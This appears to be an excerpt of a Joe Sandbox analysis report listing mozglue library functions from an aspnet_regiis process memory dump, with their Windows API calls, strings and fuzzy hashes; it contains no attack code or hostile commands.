                                                                                                                            • API String ID: 4244350000-0
                                                                                                                            • Opcode ID: 48c9bad459ecd5bc87242e5bc539c43d65668b94cd0c8bde2338bf733d256b02
                                                                                                                            • Instruction ID: 9020d6467d97d03dad1bdf227b5e833e3ca0ed13729fa079901d20a970ebeae8
                                                                                                                            • Opcode Fuzzy Hash: 48c9bad459ecd5bc87242e5bc539c43d65668b94cd0c8bde2338bf733d256b02
                                                                                                                            • Instruction Fuzzy Hash: 9621F671A002059BDB008FA9DC50BAEBBB9FF42304F284139E919DB341F77AD951C7A1
                                                                                                                            Function 6CC2B7A0 Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6CC2B7CF
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6CC2B808
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6CC2B82C
                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CC2B840
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC2B849
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1977084945-0
                                                                                                                            • Opcode ID: 4f89654d6d0d9043c17e8aa6f1d4d9e719629cbd7225d5261060d469ef3ce4ca
                                                                                                                            • Instruction ID: 6297aca3a32c838319ed99a7030be7069495c961ba1d58f2cdd1f7e01311b94d
                                                                                                                            • Opcode Fuzzy Hash: 4f89654d6d0d9043c17e8aa6f1d4d9e719629cbd7225d5261060d469ef3ce4ca
                                                                                                                            • Instruction Fuzzy Hash: AD2128B0E002099FDF04DFA9D8955BEBBB4EF49314F14812AE84AA7341E735A945CBA1
                                                                                                                            Function 6CC86E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6CC86E78
                                                                                                                              • Part of subcall function 6CC86A10: InitializeCriticalSection.KERNEL32(6CCAF618), ref: 6CC86A68
                                                                                                                              • Part of subcall function 6CC86A10: GetCurrentProcess.KERNEL32 ref: 6CC86A7D
                                                                                                                              • Part of subcall function 6CC86A10: GetCurrentProcess.KERNEL32 ref: 6CC86AA1
                                                                                                                              • Part of subcall function 6CC86A10: EnterCriticalSection.KERNEL32(6CCAF618), ref: 6CC86AAE
                                                                                                                              • Part of subcall function 6CC86A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6CC86AE1
                                                                                                                              • Part of subcall function 6CC86A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6CC86B15
                                                                                                                              • Part of subcall function 6CC86A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6CC86B65
                                                                                                                              • Part of subcall function 6CC86A10: LeaveCriticalSection.KERNEL32(6CCAF618,?,?), ref: 6CC86B83
                                                                                                                            • MozFormatCodeAddress.MOZGLUE ref: 6CC86EC1
                                                                                                                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6CC86EE1
                                                                                                                            • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6CC86EED
                                                                                                                            • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6CC86EFF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4058739482-0
                                                                                                                            • Opcode ID: af14cddd41d77ce9cdb3ec925910675d009359937c01d41b4fa37dfc279a3070
                                                                                                                            • Instruction ID: 37f67466b9578e7140e962580ea00750ccf5578db290b7f6f2f5f4db0d4e4077
                                                                                                                            • Opcode Fuzzy Hash: af14cddd41d77ce9cdb3ec925910675d009359937c01d41b4fa37dfc279a3070
                                                                                                                            • Instruction Fuzzy Hash: 8D21A471A042199FDB00CF69D8856DF7BF5FF88308F044039E80997341EB749A598F92
                                                                                                                            Function 6CC876C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WideCharToMultiByte.KERNEL32 ref: 6CC876F2
                                                                                                                            • moz_xmalloc.MOZGLUE(00000001), ref: 6CC87705
                                                                                                                              • Part of subcall function 6CC3CA10: malloc.MOZGLUE(?), ref: 6CC3CA26
                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CC87717
                                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6CC8778F,00000000,00000000,00000000,00000000), ref: 6CC87731
                                                                                                                            • free.MOZGLUE(00000000), ref: 6CC87760
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2538299546-0
                                                                                                                            • Opcode ID: d3b45af09c8b64400e4879f29e4992e2c15943634bfca3b3af7ecb8d72c37160
                                                                                                                            • Instruction ID: b4491b9d1a97bd90dc65e685dc65ec503025251cac029d68f6bd4a253f7aeb20
                                                                                                                            • Opcode Fuzzy Hash: d3b45af09c8b64400e4879f29e4992e2c15943634bfca3b3af7ecb8d72c37160
                                                                                                                            • Instruction Fuzzy Hash: A711B2B1A012256BEB10AFB69C44BABBEF8EF46354F044529F848A7300F7708850C7E2
                                                                                                                            Function 6CC60D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6CC23DEF), ref: 6CC60D71
                                                                                                                            • VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6CC23DEF), ref: 6CC60D84
                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6CC23DEF), ref: 6CC60DAF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$Free$Alloc
                                                                                                                            • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                            • API String ID: 1852963964-2186867486
                                                                                                                            • Opcode ID: b5a1accb29b54bf884a652603dff49dd51a3cc6197800f7ca93e987c234daa3a
                                                                                                                            • Instruction ID: c29e68b4c5127da609290b4c12f5fa97a0b9c22f4af7d53325732dc71c8585f7
                                                                                                                            • Opcode Fuzzy Hash: b5a1accb29b54bf884a652603dff49dd51a3cc6197800f7ca93e987c234daa3a
                                                                                                                            • Instruction Fuzzy Hash: C2F0E93138069923E62413AB9D4EB5A367D7BC2B65F344176F214FFDC0FA50E8054AAD
                                                                                                                            Function 6CC77620 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6CC775C4,?), ref: 6CC7762B
                                                                                                                              • Part of subcall function 6CC3CA10: malloc.MOZGLUE(?), ref: 6CC3CA26
                                                                                                                            • InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6CC774D7,6CC815FC,?,?,?), ref: 6CC77644
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7765A
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6CC774D7,6CC815FC,?,?,?), ref: 6CC77663
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6CC774D7,6CC815FC,?,?,?), ref: 6CC77677
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 418114769-0
                                                                                                                            • Opcode ID: 86fcc03d842133fbd479619ce46904bd284e78c36ab32138192b6e0f3e6dea7e
                                                                                                                            • Instruction ID: 0c3a593002640434867c385143d08605f9735549f67fe783627da1af629c4da3
                                                                                                                            • Opcode Fuzzy Hash: 86fcc03d842133fbd479619ce46904bd284e78c36ab32138192b6e0f3e6dea7e
                                                                                                                            • Instruction Fuzzy Hash: D0F0C271E10749ABD7008F62D89867AB778FFEB359F11531AF90453601E7B1A5D08BD0
                                                                                                                            Function 6CC81700 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC81800
                                                                                                                              • Part of subcall function 6CC5CBE8: GetCurrentProcess.KERNEL32(?,6CC231A7), ref: 6CC5CBF1
                                                                                                                              • Part of subcall function 6CC5CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC231A7), ref: 6CC5CBFA
                                                                                                                              • Part of subcall function 6CC24290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CC63EBD,6CC63EBD,00000000), ref: 6CC242A9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CurrentInit_thread_footerTerminatestrlen
                                                                                                                            • String ID: Details$name${marker.name} - {marker.data.name}
                                                                                                                            • API String ID: 46770647-1733325692
                                                                                                                            • Opcode ID: 8e8a2cc103e942563a29e772408d4b29b4afce15f95f8d5b1edb2b17b6d6005b
                                                                                                                            • Instruction ID: 33acbf88a5c841f4308e4f75431f735d37bc8cd7bfa54083cf0a04ec2c0a6f9f
                                                                                                                            • Opcode Fuzzy Hash: 8e8a2cc103e942563a29e772408d4b29b4afce15f95f8d5b1edb2b17b6d6005b
                                                                                                                            • Instruction Fuzzy Hash: A671E171A003469FCB04DF69D454BAABBF2FF85314F40466DD8154BB41EB70A6A8CBE2
                                                                                                                            Function 6CC4D468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6CC5CBE8: GetCurrentProcess.KERNEL32(?,6CC231A7), ref: 6CC5CBF1
                                                                                                                              • Part of subcall function 6CC5CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC231A7), ref: 6CC5CBFA
                                                                                                                            • EnterCriticalSection.KERNEL32(6CCAE784,?,?,?,?,?,?,?,00000000,771B2FE0,00000001,?,6CC5D1C5), ref: 6CC4D4F2
                                                                                                                            • LeaveCriticalSection.KERNEL32(6CCAE784,?,?,?,?,?,?,?,00000000,771B2FE0,00000001,?,6CC5D1C5), ref: 6CC4D50B
                                                                                                                              • Part of subcall function 6CC2CFE0: EnterCriticalSection.KERNEL32(6CCAE784), ref: 6CC2CFF6
                                                                                                                              • Part of subcall function 6CC2CFE0: LeaveCriticalSection.KERNEL32(6CCAE784), ref: 6CC2D026
                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,771B2FE0,00000001,?,6CC5D1C5), ref: 6CC4D52E
                                                                                                                            • EnterCriticalSection.KERNEL32(6CCAE7DC), ref: 6CC4D690
                                                                                                                            • LeaveCriticalSection.KERNEL32(6CCAE784,?,?,?,?,?,?,?,00000000,771B2FE0,00000001,?,6CC5D1C5), ref: 6CC4D751
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                                                                            • String ID: MOZ_CRASH()
                                                                                                                            • API String ID: 3805649505-2608361144
                                                                                                                            • Opcode ID: 18c4ff0bddd0774c4ed18b35f3508ad1fd367a05f127cb6db1a0075e45fb36f3
                                                                                                                            • Instruction ID: 85e193941fa7583a09c63e3e5766227f586da08e6867b8702e5af80368d637d5
                                                                                                                            • Opcode Fuzzy Hash: 18c4ff0bddd0774c4ed18b35f3508ad1fd367a05f127cb6db1a0075e45fb36f3
                                                                                                                            • Instruction Fuzzy Hash: A951D271A047028FD328DF69C0A865AB7F1EB89714F54CA2ED59AC7B84E770E850CB91
                                                                                                                            Function 6CC74630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __aulldiv
                                                                                                                            • String ID: -%llu$.$profiler-paused
                                                                                                                            • API String ID: 3732870572-2661126502
                                                                                                                            • Opcode ID: b4ad319430c20dfbbd06784d622edd4b1d2a3606d203391b8a96dfe58f979248
                                                                                                                            • Instruction ID: 615d76607c9180189f9feb729b24c2819aefd0b23ef820431d44c117f6d4f1e5
                                                                                                                            • Opcode Fuzzy Hash: b4ad319430c20dfbbd06784d622edd4b1d2a3606d203391b8a96dfe58f979248
                                                                                                                            • Instruction Fuzzy Hash: 7A413571E046089BCB08DF79E85115EBBF5EF85744F10862EE855ABB81FB309854CB92
                                                                                                                            Function 6CC746E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __aulldiv.LIBCMT ref: 6CC74721
                                                                                                                              • Part of subcall function 6CC24410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6CC63EBD,00000017,?,00000000,?,6CC63EBD,?,?,6CC242D2), ref: 6CC24444
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __aulldiv__stdio_common_vsprintf
                                                                                                                            • String ID: -%llu$.$profiler-paused
                                                                                                                            • API String ID: 680628322-2661126502
                                                                                                                            • Opcode ID: 7c04cd6880fe16e5e6caf7f403acdbaddcb0c36086239402ff99dd5c89e1d2b4
                                                                                                                            • Instruction ID: 9641ef85c75f26a65269b76809e6d50071f9a57bc66849816a0312f6aa1cae33
                                                                                                                            • Opcode Fuzzy Hash: 7c04cd6880fe16e5e6caf7f403acdbaddcb0c36086239402ff99dd5c89e1d2b4
                                                                                                                            • Instruction Fuzzy Hash: 6E313771F042088BCB0CCFADD89569EBBE6DB89314F15813EE8059BB41FB749904CBA0
                                                                                                                            Function 6CC7B410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6CC24290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CC63EBD,6CC63EBD,00000000), ref: 6CC242A9
                                                                                                                            • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6CC7B127), ref: 6CC7B463
                                                                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7B4C9
                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6CC7B4E4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _getpidstrlenstrncmptolower
                                                                                                                            • String ID: pid:
                                                                                                                            • API String ID: 1720406129-3403741246
                                                                                                                            • Opcode ID: 77fdd34ad704a3410567dc7fe1f673fd515b422ecffd8003f73d36106ffbf1ba
                                                                                                                            • Instruction ID: 1b42e98fbd536d8e2819c31164d68be4cda76d99b51332ce3ad9aa7c2a4e4143
                                                                                                                            • Opcode Fuzzy Hash: 77fdd34ad704a3410567dc7fe1f673fd515b422ecffd8003f73d36106ffbf1ba
                                                                                                                            • Instruction Fuzzy Hash: 4931E331A01208DFDB20DFAAD894AEEB7B5FF45318F580529E81167A41E731E865CBF1
                                                                                                                            Function 6CC6E550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6E577
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC6E584
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC6E5DE
                                                                                                                            • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CC6E8A6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
                                                                                                                            • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                                                                                            • API String ID: 1483687287-53385798
                                                                                                                            • Opcode ID: 6861ccf26647e0fee0096c69913a695fc90ca27cba9bd48b4fd74ba0ba413c5d
                                                                                                                            • Instruction ID: 6059e7c0554ca9c2b08a2d464735f1362ee1948f853a7452ca35c5fb46686ed3
                                                                                                                            • Opcode Fuzzy Hash: 6861ccf26647e0fee0096c69913a695fc90ca27cba9bd48b4fd74ba0ba413c5d
                                                                                                                            • Instruction Fuzzy Hash: A6116131A04258DFCB009F99D94CA5DBBB4FB89368F41051DF84557B50E770A806CBE5
                                                                                                                            Function 6CC70C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC70CD5
                                                                                                                              • Part of subcall function 6CC5F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CC5F9A7
                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC70D40
                                                                                                                            • free.MOZGLUE ref: 6CC70DCB
                                                                                                                              • Part of subcall function 6CC45E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC45EDB
                                                                                                                              • Part of subcall function 6CC45E90: memset.VCRUNTIME140(6CC87765,000000E5,55CCCCCC), ref: 6CC45F27
                                                                                                                              • Part of subcall function 6CC45E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC45FB2
                                                                                                                            • free.MOZGLUE ref: 6CC70DDD
                                                                                                                            • free.MOZGLUE ref: 6CC70DF2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4069420150-0
                                                                                                                            • Opcode ID: 14f9bf0d587b99270d64e737a5d9f472a7b31205a853f311b7e8557a7de88d3d
                                                                                                                            • Instruction ID: 8beced972fc9eda1d0886dee8806771f94da43dece60e846703c9e2ad320c752
                                                                                                                            • Opcode Fuzzy Hash: 14f9bf0d587b99270d64e737a5d9f472a7b31205a853f311b7e8557a7de88d3d
                                                                                                                            • Instruction Fuzzy Hash: 664126B19087809BD320CF29C18079AFBE5FFD9754F508A2EE8D887710EB709845CB92
                                                                                                                            Function 6CC7CCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6CC6DA31,00100000,?,?,00000000,?), ref: 6CC7CDA4
                                                                                                                              • Part of subcall function 6CC3CA10: malloc.MOZGLUE(?), ref: 6CC3CA26
                                                                                                                              • Part of subcall function 6CC7D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6CC7CDBA,00100000,?,00000000,?,6CC6DA31,00100000,?,?,00000000,?), ref: 6CC7D158
                                                                                                                              • Part of subcall function 6CC7D130: InitializeConditionVariable.KERNEL32(00000098,?,6CC7CDBA,00100000,?,00000000,?,6CC6DA31,00100000,?,?,00000000,?), ref: 6CC7D177
